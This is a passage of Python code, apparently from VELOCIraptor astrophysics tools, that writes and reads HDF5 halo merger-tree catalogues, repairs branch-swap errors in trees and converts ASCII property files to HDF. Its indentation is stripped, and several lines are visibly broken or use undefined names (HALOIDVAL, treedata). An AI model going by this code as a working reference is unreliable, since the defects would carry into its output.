#now close file and use the pytables interface so as to write the table
hdffile.close()
#now write tables using pandas interface
for i in range(numsnaps):
#lets see if we can alter the code to write a table
keys=halodata[i].keys()
#remove tree keys
for tkey in treekeys: keys.remove(tkey)
#make temp dict
dictval=dict()
for key in keys:
dictval[key]=halodata[i][key]
#make a pandas DataFrame using halo dictionary
df=pd.DataFrame.from_dict(dictval)
df.to_hdf(fname+".snap.hdf.data","Snapshots/Snap_%03d/Halos"%(numsnaps-1-i), format='table', mode='a')
#reopen with h5py interface
hdffile=h5py.File(fname+".snap.hdf.data",'a')
#then write tree information in separate group
treegrp=hdffile.create_group("MergerTree")
#Tree group should contain
"""
HaloSnapID
HaloSnapNum
HaloSnapIndex
ProgenitorIndex
ProgenitorSnapnum
ProgenitorID
DescendantIndex
..
..
RootProgenitorIndex
..
..
RootDescendantIndex
"""
#to save on memory, allocate each block separately
#store halo information
tothalos=sum(numhalos)
tdata=np.zeros(tothalos,dtype=halodata[0]["ID"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["ID"]
count+=int(numhalos[i])
treegrp.create_dataset("HaloSnapID",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint32)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=i
count+=int(numhalos[i])
treegrp.create_dataset("HaloSnapNum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=range(int(numhalos[i]))
count+=int(numhalos[i])
treegrp.create_dataset("HaloSnapIndex",data=tdata)
#store progenitors
tdata=np.zeros(tothalos,dtype=halodata[0]["Tail"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["Tail"]
count+=int(numhalos[i])
treegrp.create_dataset("ProgenitorID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["TailSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["TailSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("ProgenitorSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["Tail"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("ProgenitorIndex",data=tdata)
#store descendants
tdata=np.zeros(tothalos,dtype=halodata[0]["Head"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["Head"]
count+=int(numhalos[i])
treegrp.create_dataset("DescendantID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["HeadSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["HeadSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("DescendantSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["Head"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("DescendantIndex",data=tdata)
#store progenitors
tdata=np.zeros(tothalos,dtype=halodata[0]["RootTail"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootTail"]
count+=int(numhalos[i])
treegrp.create_dataset("RootProgenitorID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["RootTailSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootTailSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("RootProgenitorSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["RootTail"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("RootProgenitorIndex",data=tdata)
#store descendants
tdata=np.zeros(tothalos,dtype=halodata[0]["RootHead"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootHead"]
count+=int(numhalos[i])
treegrp.create_dataset("RootDescendantID",data=tdata)
tdata=np.zeros(tothalos,dtype=halodata[0]["RootHeadSnap"].dtype)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["RootHeadSnap"]
count+=int(numhalos[i])
treegrp.create_dataset("RootDescendantSnapnum",data=tdata)
tdata=np.zeros(tothalos,dtype=np.uint64)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=(halodata[i]["RootHead"]%TEMPORALHALOIDVAL-1)
count+=int(numhalos[i])
treegrp.create_dataset("RootDescendantIndex",data=tdata)
#store number of progenitors
tdata=np.zeros(tothalos,dtype=np.uint32)
count=0
for i in range(numsnaps):
tdata[count:int(numhalos[i])+count]=halodata[i]["Num_progen"]
count+=int(numhalos[i])
treegrp.create_dataset("NProgen",data=tdata)
hdffile.close()
def ReadUnifiedTreeandHaloCatalog(fname, desiredfields=[], icombinedfile=1,iverbose=1):
"""
Read Unified Tree and halo catalog from HDF file with base filename fname.
Parameters
----------
Returns
-------
"""
if (icombinedfile):
hdffile=h5py.File(fname+".snap.hdf.data",'r')
#load data sets containing number of snaps
headergrpname="Header/"
numsnaps=hdffile[headergrpname].attrs["NSnaps"]
#allocate memory
halodata=[dict() for i in range(numsnaps)]
numhalos=[0 for i in range(numsnaps)]
atime=[0 for i in range(numsnaps)]
tree=[[] for i in range(numsnaps)]
cosmodata=dict()
unitdata=dict()
#load cosmology data
cosmogrpname="Cosmology/"
fieldnames=[str(n) for n in hdffile[headergrpname+cosmogrpname].attrs.keys()]
for fieldname in fieldnames:
cosmodata[fieldname]=hdffile[headergrpname+cosmogrpname].attrs[fieldname]
#load unit data
unitgrpname="Units/"
fieldnames=[str(n) for n in hdffile[headergrpname+unitgrpname].attrs.keys()]
for fieldname in fieldnames:
unitdata[fieldname]=hdffile[headergrpname+unitgrpname].attrs[fieldname]
#for each snap load the appropriate group
start=time.clock()
for i in range(numsnaps):
snapgrpname="Snap_%03d/"%(numsnaps-1-i)
if (iverbose==1):
print("Reading ",snapgrpname)
isnap=hdffile[snapgrpname].attrs["Snapnum"]
atime[isnap]=hdffile[snapgrpname].attrs["scalefactor"]
numhalos[isnap]=hdffile[snapgrpname].attrs["NHalos"]
if (len(desiredfields)>0):
fieldnames=desiredfields
else:
fieldnames=[str(n) for n in hdffile[snapgrpname].keys()]
for catvalue in fieldnames:
halodata[isnap][catvalue]=np.array(hdffile[snapgrpname+catvalue])
hdffile.close()
print("read halo data ",time.clock()-start)
else :
hdffile=h5py.File(fname+".snap_000.hdf.data",'r')
numsnaps=int(hdffile["NSnaps"][0])
#get field names
fieldnames=[str(n) for n in hdffile.keys()]
#clean of header info
fieldnames.remove("Snapnum")
fieldnames.remove("NSnaps")
fieldnames.remove("NHalos")
fieldnames.remove("TotalNHalos")
fieldnames.remove("scalefactor")
if (len(desiredfields)>0):
fieldnames=desiredfields
hdffile.close()
halodata=[[] for i in range(numsnaps)]
numhalos=[0 for i in range(numsnaps)]
atime=[0 for i in range(numsnaps)]
tree=[[] for i in range(numsnaps)]
start=time.clock()
for i in range(numsnaps):
hdffile=h5py.File(fname+".snap_%03d.hdf.data"%(numsnaps-1-i),'r')
atime[i]=(hdffile["scalefactor"])[0]
numhalos[i]=(hdffile["NHalos"])[0]
halodata[i]=dict()
for catvalue in fieldnames:
halodata[i][catvalue]=np.array(hdffile[catvalue])
hdffile.close()
print("read halo data ",time.clock()-start)
#lets ignore the tree file for now
for i in range(numsnaps):
tree[i]=dict()
return atime,tree,numhalos,halodata,cosmodata,unitdata
if (icombinedfile==1):
hdffile=h5py.File(fname+".tree.hdf.data",'r')
treefields=["haloID", "Num_progen"]
#do be completed for Progenitor list although information is contained in the halo catalog by searching for things with the same head
#treefields=["haloID", "Num_progen", "Progen"]
for i in range(numsnaps):
snapgrpname="Snap_%03d/"%(numsnaps-1-i)
tree[i]=dict()
for catvalue in treefields:
"""
if (catvalue==treefields[-1]):
tree[i][catvalue]=[[]for j in range(numhalos[i])]
for j in range(numhalos[i]):
halogrpname=snapgrpname+"/Halo"+str(j)
tree[i][catvalue]=np.array(hdffile[halogrpname+catvalue])
else:
tree[i][catvalue]=np.array(hdffile[snapgrpname+catvalue])
"""
tree[i][catvalue]=np.array(hdffile[snapgrpname+catvalue])
hdffile.close()
return atime,tree,numhalos,halodata,cosmodata,unitdata
def ProduceWalkableHDFTree(fname,numsnaps,tree,numhalos,halodata,atime,
descripdata={'Title':'Tree catalogue', 'VELOCIraptor_version':1.3, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False}
):
"""
Produces a HDF5 formatted file containing Reduced Walkable Tree information,
ie; RootHead, Head, HeadSnap, Tail, RootTail, etc.
Parameters
----------
fname : string
filename of the hdf file to be written
numsnaps : int
the number of snapshots
tree : dict
the tree data
numhalos : array
array of number of halos per snapshot
halodata : dict
the halo data dictionary
atime : array
array of scalefactors/times of the snaphots
discrptdata : dict
stores a description of how the tree catalogue was produced
Returns
-------
void :
Only writes an hdf file. Nothing is returned.
"""
hdffile=h5py.File(fname,'w')
headergrp=hdffile.create_group("Header")
#store useful information such as number of snapshots, halos,
#cosmology (Omega_m,Omega_b,Hubble_param,Omega_Lambda, Box size)
#units (Physical [1/0] for physical/comoving flag, length in Mpc, km/s, solar masses, Gravity
#and TEMPORALHALOIDVAL used to traverse tree information (converting halo ids to haloindex or snapshot), Reverse_order [1/0] for last snap listed first)
#set the attributes of the header
headergrp.attrs["NSnaps"]=numsnaps
#overall description
headergrp.attrs["Title"]=descripdata["Title"]
findergrp=headergrp.create_group("HaloFinder")
findergrp.attrs["Name"]="VELOCIraptor"
findergrp.attrs["Version"]=descripdata["VELOCIraptor_version"]
findergrp.attrs["Particle_num_threshold"]=descripdata["Particle_num_threshold"]
treebuildergrp=headergrp.create_group("TreeBuilder")
treebuildergrp.attrs["Name"]="VELOCIraptor-Tree"
treebuildergrp.attrs["Version"]=descripdata["Tree_version"]
treebuildergrp.attrs["Temporal_linking_length"]=descripdata["Temporal_linking_length"]
#now need to create groups for halos and then a group containing tree information
snapsgrp=hdffile.create_group("Snapshots")
#internal tree keys
halokeys=["RootHead", "RootHeadSnap", "Head", "HeadSnap", "Tail", "TailSnap", "RootTail", "RootTailSnap", "ID", "Num_progen"]
for i in range(numsnaps):
#note that I normally have information in reverse order so that might be something in the units
snapgrp=snapsgrp.create_group("Snap_%03d"%i)
snapgrp.attrs["Snapnum"]=i
snapgrp.attrs["NHalos"]=numhalos[i]
snapgrp.attrs["scalefactor"]=atime[i]
for key in halokeys:
snapgrp.create_dataset(key,data=halodata[i][key])
hdffile.close()
def ReadWalkableHDFTree(fname, iverbose=True):
"""
Reads a simple walkable hdf tree file.
Assumes the input has
["RootHead", "RootHeadSnap", "Head", "HeadSnap", "Tail", "TailSnap", "RootTail", "RootTailSnap", "ID", "Num_progen"]
along with attributes per snap of the scale factor (eventually must generalize to time as well )
should also have a header gropu with attributes like number of snapshots.
Returns the halos IDs with walkable tree data, number of snaps, and the number of snapshots searched.
"""
hdffile=h5py.File(fname,'r')
numsnaps=hdffile['Header'].attrs["NSnaps"]
nsnapsearch=["Header/TreeBuilder"].attrs["Temporal_linking_length"]
if (iverbose): print("number of snaps",numsnaps)
halodata=[dict() for i in range(numsnaps)]
for i in range(numsnaps):
#note that I normally have information in reverse order so that might be something in the units
if (iverbose): print("snap ",i)
for key in hdffile['Snapshots']['Snap_%03d'%i].keys():
halodata[i][key]=np.array(hdffile['Snapshots']['Snap_%03d'%i][key])
hdffile.close()
return halodata,numsnaps,nsnapsearch
def FixTruncationBranchSwapsInTreeDescendant(rawtreefname,reducedtreename,snapproplistfname,outputupdatedreducedtreename,
descripdata={'Title':'Tree catalogue', 'VELOCIraptor_version':1.3, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
npartlim=200,meritlim=0.025,xdifflim=2.0,vdifflim=1.0,snapsearch=4,
TEMPORALHALOIDVAL=1000000000000,
ibuildtree=False,inputtreeformat=2,inputpropformat=2,inputpropsplitformat=0):
"""
Updates a tree produced by TreeFrog to correct any branch swap events leading to truncation
that requires full roothead/root tail information to correctly fix.
"""
rawtreedata=ReadHaloMergerTreeDescendant(rawtreefname,False,inputtreeformat,0,True)
#and also extract the description used to make the tree
numsnaps=len(rawtreedata)
if (ibuildtree):
halo=[dict() for i in range(numsnaps)]
numhalos=np.zeros(numsnaps,dtype=np.uint64)
BuildTemporalHeadTailDescendant(numsnaps,rawtreedata,numhalos,halodata,TEMPORALHALOIDVAL)
else:
halodata=ReadWalkableHDFTree(reducedtreename)
proplist=['npart','hostHaloID','Structuretype','ID','Xc','Yc','Zc','VXc','VYc','VZc','Rmax','Vmax','R_200crit']
numhalos=np.zeros(numsnaps,dtype=np.uint64)
snaplist=open(snapproplistfname,'r')
for i in range(numsnaps):
snapfile=snaplist.readline().strip()
halotemp,numhalos[i]=ReadPropertyFile(snapfile,inputpropformat,inputpropsplitformat,0,proplist)
halodata[i].update(halotemp)
#strip off simulation info and unit info
SimulationInfo=copy.deepcopy(halodata[0]['SimulationInfo'])
UnitInfo=copy.deepcopy(halodata[0]['SimulationInfo'])
period=['SimulationInfo']['Period']
#convert positions and sizes to comoving if necesary
if (UnitInfo['Comoving_or_Physical']==0 and SimulationInfo['Cosmological_Sim']==1):
converttocomove=['Xc','Yc','Zc','Rmax','R_200crit']
for i in range(numsnaps):
for key in converttocomove:
halodata[i][key]/=halodata[i]['SimulationInfo']['ScaleFactor']
#extracted period from first snap so can use the scale factor stored in simulation info
period/=SimulationInfo['ScaleFactor']
atime=np.zeros(numsnaps)
numhalos=np.zeros(numsnaps,dtype=np.int64)
for i in range(numsnaps):
atime[i]=halodata[i]['SimulationInfo']['ScaleFactor']
numhalos[i]=len(halodata[i]['Xc'])
f1=open(outputupdatedreducedtreename+'.branchfix.log','w')
for i in range(numsnaps-1):
#find halos with no progenitors that are large enough and continue to exist for several snapshots
if(numhalos[i]==0): continue
noprog=np.where((halodata[i]['Tail']==halodata[i]['ID'])*(halodata[i]['npart']>=npartlim)*(halodata[i]['Head']!=halodata[i]['ID']))
if (len(noprog[0])==0):continue
#have object with no progenitor
for inoprog in noprog[0]:
#have object with no progenitor
haloID=halodata[i]['ID'][inoprog]
haloSnap=np.uint64(haloID/HALOIDVAL)
haloIndex=np.uint64(haloID%HALOIDVAL-1)
haloRootHeadID=halodata[i]['RootHead'][inoprog]
#if object doesn't have a main branch that persists for at least 1 snapshot, skip
if (halodata[np.uint32(halodata[i]['Head'][inoprog]/HALOIDVAL)]['Tail'][np.uint64(halodata[i]['Head'][inoprog]%HALOIDVAL-1)]!=haloID): continue
#get host halo
haloHost=halodata[haloSnap]['hostHaloID'][haloIndex]
if (haloHost==-1): haloHost=halodata[haloSnap]['ID'][haloIndex]
print('halo with no progenitor', haloID,halodata[i]['npart'][inoprog],halodata[i]['Structuretype'][inoprog],
haloHost,halodata[i]['Head'][inoprog],
halodata[np.uint32(halodata[i]['Head'][inoprog]/HALOIDVAL)]['Tail'][np.uint64(halodata[i]['Head'][inoprog]%HALOIDVAL-1)],
file=f1)
#first lets see if any halos previous to this point with a snapsearch radius
#point to halo with no progenitor as a high merit, 1 rank connection.
searchrange=max(0,i-snapsearch)
mergeHalo=-1
mergeMerit=-1
for isearch in range(searchrange,i):
#current candiates pointing to same root head
candidates=np.where((halodata[isearch]['RootHead']==haloRootHeadID)*(halodata[isearch]['npart']>=meritlim*halodata[i]['npart'][inoprog]))
if (len(candidates[0])==0): continue
#print(isearch,halodata[isearch]['npart'][candidates],halodata[isearch]['Structuretype'][candidates])
for ican in candidates[0]:
#if (len(np.where(treedata[isearch]['Descen'][ican]==haloID)[0])>0):
# print(haloID,' have connection ',isearch,halodata[isearch]['ID'][ican],halodata[isearch]['npart'][ican], halodata[isearch]['Structuretype'][ican], treedata[isearch]['Descen'][ican], treedata[isearch]['Merit'][ican],treedata[isearch]['Rank'][ican])
matches=np.where((treedata[isearch]['Descen'][ican]==haloID)*(treedata[isearch]['Merit'][ican]>=meritlim)*(treedata[isearch]['Rank'][ican]==1))
if (len(matches[0])==0): continue
#have a useful match for where object may have come from!
#choose highest merit
if (treedata[isearch]['Merit'][ican][matches[0][0]]>mergeMerit):
mergeHalo=halodata[isearch]['ID'][ican]
mergeMerit=treedata[isearch]['Merit'][ican][matches[0][0]]
if (mergeHalo!=-1): break
#if found nothing, can't fix
if (mergeHalo==-1): continue
#if merge halo is not a zero rank progenitor of anything, can't fix
mergeSnap=np.uint64(mergeHalo/HALOIDVAL)
mergeIndex=np.uint64(mergeHalo%HALOIDVAL-1)
if (treedata[mergeSnap]['Rank'][mergeIndex][0]!=0): continue
print(haloID, 'may have found merge halo',mergeHalo, treedata[mergeSnap]['Descen'][mergeIndex], treedata[mergeSnap]['Merit'][mergeIndex],treedata[mergeSnap]['Rank'][mergeIndex],file=f1)
#have candidate object that points to both object with no progenitor and object with progenitor
#store post merge
postmergeHalo=halodata[mergeSnap]['Head'][mergeIndex]
postmergeSnap=np.uint64(postmergeHalo/HALOIDVAL)
postmergeIndex=np.uint64(postmergeHalo%HALOIDVAL-1)
#note that if post
#store the progenitor of the halo where likely something has merged
premergeHalo=halodata[mergeSnap]['Tail'][mergeIndex]
premergeSnap=np.uint64(premergeHalo/HALOIDVAL)
premergeIndex=np.uint64(premergeHalo%HALOIDVAL-1)
#get the merge object's pre/cur/post host halos
mergeHost=halodata[mergeSnap]['hostHaloID'][mergeIndex]
if (mergeHost==-1): mergeHost=halodata[mergeSnap]['ID'][mergeIndex]
postmergeHost=halodata[postmergeSnap]['hostHaloID'][postmergeIndex]
if (postmergeHost==-1): postmergeHost=halodata[postmergeSnap]['ID'][postmergeIndex]
premergeHost=halodata[premergeSnap]['hostHaloID'][premergeIndex]
if (premergeHost==-1): premergeHost=halodata[premergeSnap]['ID'][premergeIndex]
#now lets look backwards and see if we can find an object that might be the progenitor.
#lets stick to the host halo mergeHost halo line
branchfixHalo=-1
minxdiff=minvdiff=minphase2diff=1e32
curHalo=premergeHalo
curSnap=np.uint64(curHalo/HALOIDVAL)
curIndex=np.uint64(curHalo%HALOIDVAL-1)
searchrange=max(0,curSnap-snapsearch)
while(curSnap>=searchrange and halodata[curSnap]['Tail'][curIndex]!=curHalo):
curHost=halodata[curSnap]['hostHaloID'][curIndex]
if (curHost==-1): curHost=halodata[curSnap]['ID'][curIndex]
curHostSnap=np.uint64(curHost/HALOIDVAL)
curHostIndex=np.uint64(curHost%HALOIDVAL-1)
#search for objects that end up at the same root head and have npart enough to warrent search there positions and also
candidates=np.where((halodata[curHostSnap]['RootHead']==haloRootHeadID)*(halodata[curHostSnap]['npart']>=meritlim*halodata[mergeSnap]['npart'][mergeIndex])*(halodata[curHostSnap]['Head']!=mergeHalo))[0]
#if no candidates exist, move back again
if (len(candidates)==0):
curHalo=halodata[curHostSnap]['Tail'][curHostIndex]
curSnap=np.uint64(curHalo/HALOIDVAL)
curIndex=np.uint64(curHalo%HALOIDVAL-1)
continue
#print(haloID,' list of candidate progenitors at ',curSnap,halodata[curHostSnap]['ID'][candidates],treedata[curHostSnap]['Descen'][candidates[0]],treedata[curHostSnap]['Merit'][candidates[0]])
#look at candiates
for icandidate in candidates:
#if object points to a halo at the post merge snap then has match at this point, keep looking
if (np.uint32(halodata[curHostSnap]['Head'][icandidate]/HALOIDVAL)<=haloSnap): continue
#if object is not the primary descendant do nothing
if (treedata[curHostSnap]['Rank'][icandidate][0]!=0): continue
#check its position and velocity relative post merge halo
xrel=np.array([halodata[curHostSnap]['Xc'][icandidate]-halodata[postmergeSnap]['Xc'][postmergeIndex],halodata[curHostSnap]['Yc'][icandidate]-halodata[postmergeSnap]['Yc'][postmergeIndex],halodata[curHostSnap]['Zc'][icandidate]-halodata[postmergeSnap]['Zc'][postmergeIndex]])
xrel[np.where(xrel>0.5*period)]-=period
xrel[np.where(xrel<-0.5*period)]+=period
xdiff=np.linalg.norm(xrel)/halodata[postmergeSnap]['Rmax'][postmergeIndex]
vdiff=np.linalg.norm(np.array([halodata[curHostSnap]['VXc'][icandidate]-halodata[postmergeSnap]['VXc'][postmergeIndex],halodata[curHostSnap]['VYc'][icandidate]-halodata[postmergeSnap]['VYc'][postmergeIndex],halodata[curHostSnap]['VZc'][icandidate]-halodata[postmergeSnap]['VZc'][postmergeIndex]]))/halodata[postmergeSnap]['Vmax'][postmergeIndex]
#object must have vdiff < limit and xdiff less than limit to proceed
if not (xdiff<xdifflim and vdiff<vdifflim): continue
#calculate the phase-difference, min phase-differnce should correspond to candidate progenitor to postmerge line
phase2diff=xdiff**2.0+vdiff**2.0
if (phase2diff<minphase2diff):
minphase2diff=phase2diff
minxdiff=xdiff
minvdiff=vdiff
branchfixHalo=halodata[curHostSnap]['ID'][icandidate]
curHalo=halodata[curHostSnap]['Tail'][curHostIndex]
curSnap=np.uint64(curHalo/HALOIDVAL)
curIndex=np.uint64(curHalo%HALOIDVAL-1)
if (branchfixHalo==-1): continue
branchfixSnap=np.uint64(branchfixHalo/HALOIDVAL)
branchfixIndex=np.uint64(branchfixHalo%HALOIDVAL-1)
branchfixHead=halodata[branchfixSnap]['Head'][branchfixIndex]
branchfixHeadSnap=np.uint64(branchfixHead/HALOIDVAL)
branchfixHeadIndex=np.uint64(branchfixHead%HALOIDVAL-1)
print('halo branch swap occurs at ',haloID, 'now should have progenitor', mergeHalo, 'with ',branchfixHalo,' taking over ',postmergeHalo,minxdiff,minvdiff,file=f1)
#now adjust these points, mergeHalo must have its Head changed,
#haloID must have tail and RootTail and all its descedants that share the same root tail updated
#branchfixHalo must have its head changed and all its descedants that share the same root tail updated
#postmergeHalo must now point to branchfixHalo and update head/tail and also now will point to Head of branchfixHalo
newroottail=halodata[mergeSnap]['RootTail'][mergeIndex]
newroottailbranchfix=halodata[branchfixSnap]['RootTail'][branchfixIndex]
newroottailSnap=halodata[mergeSnap]['RootTailSnap'][mergeIndex]
newroottailbranchfixSnap=halodata[branchfixSnap]['RootTailSnap'][branchfixIndex]
oldroottail=halodata[postmergeSnap]['RootTail'][postmergeIndex]
print('new tails will be ',newroottail,newroottailbranchfix,file=f1)
#adjust head tails of object with no progenitor
print('before fix merge',mergeHalo,halodata[mergeSnap]['Head'][mergeIndex],'no prog',haloID,halodata[haloSnap]['Tail'][haloIndex],file=f1)
halodata[mergeSnap]['Head'][mergeIndex]=haloID
halodata[mergeSnap]['HeadSnap'][mergeIndex]=haloSnap
halodata[haloSnap]['Tail'][haloIndex]=mergeHalo
halodata[haloSnap]['TailSnap'][haloIndex]=mergeSnap
#adjust head tails of branch swap line
print('before fix branch fix',branchfixHalo,halodata[branchfixSnap]['Head'][branchfixIndex],' post merge',postmergeHalo,halodata[postmergeSnap]['Tail'][postmergeIndex],file=f1)
halodata[branchfixSnap]['Head'][branchfixIndex]=postmergeHalo
halodata[branchfixSnap]['HeadSnap'][branchfixIndex]=postmergeSnap
halodata[postmergeSnap]['Tail'][postmergeIndex]=branchfixHalo
halodata[postmergeSnap]['TailSnap'][postmergeIndex]=branchfixSnap
halodata[postmergeSnap]['Head'][postmergeIndex]=branchfixHead
halodata[postmergeSnap]['HeadSnap'][postmergeIndex]=branchfixHeadSnap
halodata[branchfixHeadSnap]['Tail'][branchfixHeadIndex]=postmergeHalo
halodata[branchfixHeadSnap]['TailSnap'][branchfixHeadIndex]=postmergeSnap
#update the root tails
curHalo=haloID
curSnap=np.uint64(curHalo/HALOIDVAL)
curIndex=np.uint64(curHalo%HALOIDVAL-1)
#while (halodata[curSnap]['RootTail'][curIndex]==haloID):
while (True):
print('moving up branch to adjust the root tails',curHalo,curSnap,halodata[curSnap]['RootTail'][curIndex],newroottail,file=f1)
halodata[curSnap]['RootTail'][curIndex]=newroottail
halodata[curSnap]['RootTailSnap'][curIndex]=newroottailSnap
#if not on main branch exit
if (halodata[np.uint32(halodata[curSnap]['Head'][curIndex]/HALOIDVAL)]['Tail'][np.uint64(halodata[curSnap]['Head'][curIndex]%HALOIDVAL-1)]!=curHalo): break
#if at root head then exit
if (halodata[curSnap]['Head'][curIndex]==curHalo): break
curHalo=halodata[curSnap]['Head'][curIndex]
curSnap=np.uint64(curHalo/HALOIDVAL)
curIndex=np.uint64(curHalo%HALOIDVAL-1)
curHalo=postmergeHalo
curSnap=np.uint64(curHalo/HALOIDVAL)
curIndex=np.uint64(curHalo%HALOIDVAL-1)
# and halodata[curSnap]['Head'][curIndex]!=curHalo
#while (halodata[curSnap]['RootTail'][curIndex]==oldroottail):
while (True):
print('moving up fix branch to adjust the root tails',curHalo,curSnap,halodata[curSnap]['RootTail'][curIndex],newroottailbranchfix,file=f1)
halodata[curSnap]['RootTail'][curIndex]=newroottailbranchfix
halodata[curSnap]['RootTailSnap'][curIndex]=newroottailbranchfixSnap
#if not on main branch exit
if (halodata[np.uint32(halodata[curSnap]['Head'][curIndex]/HALOIDVAL)]['Tail'][np.uint64(halodata[curSnap]['Head'][curIndex]%HALOIDVAL-1)]!=curHalo): break
#if at root head then exit
if (halodata[curSnap]['Head'][curIndex]==curHalo): break
curHalo=halodata[curSnap]['Head'][curIndex]
curSnap=np.uint64(curHalo/HALOIDVAL)
curIndex=np.uint64(curHalo%HALOIDVAL-1)
f1.close()
ProduceWalkableHDFTree(outputupdatedreducedtreename,numsnaps,rawtreedata,numhalos,halodata,atime,descripdata)
return rawtreedata,halodata,numhalos,atime
"""
Conversion Tools
"""
def ConvertASCIIPropertyFileToHDF(basefilename,iseparatesubfiles=0,iverbose=0):
"""
Reads an ASCII file and converts it to the HDF format for VELOCIraptor properties files
"""
inompi=True
if (iverbose): print("reading properties file and converting to hdf",basefilename,os.path.isfile(basefilename))
filename=basefilename+".properties"
#load header
if (os.path.isfile(basefilename)==True):
numfiles=0
else:
filename=basefilename+".properties"+".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
names = ((halofile.readline())).split()
#remove the brackets in ascii file names
fieldnames= [fieldname.split("(")[0] for fieldname in names]
halofile.close()
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".properties"
hdffilename=basefilename+".hdf.properties"
else:
filename=basefilename+".properties"+"."+str(ifile)
hdffilename=basefilename+".hdf.properties"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): htemp = np.loadtxt(filename,skiprows=3).transpose()
else: htemp=[[]for ikeys in range(len(fieldnames))]
for ikeys in range(len(fieldnames)):
if (fieldnames[ikeys]=="ID"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.uint64))
elif (fieldnames[ikeys]=="ID_mbp"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.int64))
elif (fieldnames[ikeys]=="hostHaloID"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.int64))
elif fieldnames[ikeys] in ["numSubStruct","npart","n_gas","n_star"]:
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys], dtype=np.uint64))
else:
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys], dtype=np.float64))
hdffile.close()
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True):
filename=basefilename+".sublevels"+".properties"
hdffilename=basefilename+".hdf"+".sublevels"+".properties"
else:
filename=basefilename+".sublevels"+".properties"+"."+str(ifile)
hdffilename=basefilename+".hdf"+".sublevels"+".properties"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
halofile = open(filename, 'r')
hdffile=h5py.File(hdffilename,'w')
[filenum,numfiles]=halofile.readline().split()
[numhalos, numtothalos]= halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
#write header info
hdffile.create_dataset("File_id",data=np.array([filenum]))
hdffile.create_dataset("Num_of_files",data=np.array([numfiles]))
hdffile.create_dataset("Num_of_groups",data=np.array([numhalos]));
hdffile.create_dataset("Total_num_of_groups",data=np.array([numtothalos]));
halofile.close()
if (numhalos>0): htemp = np.loadtxt(filename,skiprows=3).transpose()
else: htemp=[[]for ikeys in range(len(fieldnames))]
for ikeys in range(len(fieldnames)):
if (fieldnames[ikeys]=="ID"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.uint64))
elif (fieldnames[ikeys]=="ID_mbp"):
hdffile.create_dataset(fieldnames[ikeys],data=np.array(htemp[ikeys],dtype=np.int64))
elif (fieldnames[ikeys]=="hostHaloID"):
